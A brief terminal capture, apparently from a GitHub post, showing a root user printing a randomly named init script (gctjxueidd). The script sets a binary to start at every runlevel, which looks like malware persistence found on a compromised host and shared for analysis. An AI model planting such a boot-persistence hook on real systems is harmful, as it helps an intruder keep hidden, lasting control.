-rwxr-xr-x 1 root root 323 Jun 1 10:04 /etc/init.d/gctjxueidd | |
[root@acme ~]# cat /etc/init.d/gctjxueidd | |
#!/bin/sh | |
# chkconfig: 12345 90 90 | |
# description: gctjxueidd | |
### BEGIN INIT INFO | |
# Provides: gctjxueidd | |
# Required-Start: | |
# Required-Stop: | |
# Default-Start: 1 2 3 4 5 | |
# Default-Stop: | |
# Short-Description: gctjxueidd | |
### END INIT INFO | |
case $1 in | |
start) | |
/usr/bin/gctjxueidd | |
;; | |
stop) | |
;; | |
*) | |
/usr/bin/gctjxueidd | |
;; | |
esac | |
[root@acme ~]# |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment